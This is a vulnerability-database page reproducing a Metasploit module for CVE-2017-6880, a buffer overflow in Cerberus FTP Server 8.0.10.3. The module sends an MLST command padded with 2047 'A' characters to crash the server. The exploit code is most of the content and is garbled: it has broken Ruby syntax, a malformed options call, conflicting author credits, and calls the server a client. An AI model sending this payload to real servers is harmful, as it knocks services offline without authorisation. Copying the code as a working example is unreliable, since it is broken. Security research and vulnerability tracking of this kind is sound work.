Lucene search
K

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

🗓️ 15 May 2017 00:00:00Reported by Souhardya SardarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

Cerberus FTP Server 8.0.10.3 MLST Remote Buffer Overflow

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability
17 Mar 201700:00
zdt
CNVD
Cerberus FTP Server Remote Buffer Overflow Vulnerability (CNVD-2017-08299)
12 May 201700:00
cnvd
CVE
CVE-2017-6880
17 Mar 201717:00
cve
Cvelist
CVE-2017-6880
17 Mar 201717:00
cvelist
Exploit DB
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)
16 Mar 201700:00
exploitdb
EUVD
EUVD-2017-15934
7 Oct 202500:30
euvd
exploitpack
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
16 Mar 201700:00
exploitpack
NVD
CVE-2017-6880
17 Mar 201717:59
nvd
OSV
CVE-2017-6880
17 Mar 201717:59
osv
Prion
Buffer overflow
17 Mar 201717:59
prion
Rows per page
`#!/usr/share/ruby  
  
#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow  
#[+] Credits / Discovery: Nassim Asrir  
#[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/  
#[+] Metasploit Module Author : Souhardya Sardar   
#[+] Metasploit Module Author Contact: github.com/Souhardya | [email protected]  
#[+] Author Company: Henceforth  
#[+] CVE: CVE-2017-6880  
  
#Vendor:  
#===============  
#   
#https://www.cerberusftp.com/  
  
  
#Download:  
#===========  
#   
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)  
  
  
#Vulnerability Type:  
#===================  
#   
#Remote Buffer Overflow.  
  
  
  
# ----------------------------  
# Module Dependencies/requires  
# ----------------------------  
  
require 'msf/core'  
  
# ----------------------------------  
# Metasploit Class name and includes  
# ----------------------------------  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Ftp  
  
# -----------------------------------------  
# Initialize information  
# -----------------------------------------  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Cerber FTP Remote Buffer Overflow ',  
'Description' => %q{  
This module exploits a buffer overflow in the Cerber FTP client that is triggered  
by sending a bad char "A" in the command "MLST" (2047) .  
},  
  
'Author' =>  
[  
'Module Author And Bug Discovered by : Peter Baris',   
'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)  
'Thanks to : Nidhish Pandya ', #auditing:)  
  
  
],  
'License' => NONE,  
'Platform' => ['win']  
  
'References' =>  
[  
[ 'CVE', 'CVE-2017-6880' ],  
[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]   
  
]))  
  
register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])  
], self.class)  
deregister_options('FTPUSER', 'FTPPASS')  
end  
  
def exploit  
connect  
  
payload = "A"*2047  
  
print_status("Trying to connect to target server {target.name...")  
  
  
sock.put('MLST ' + payload + '\r\n')  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 May 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.0552
44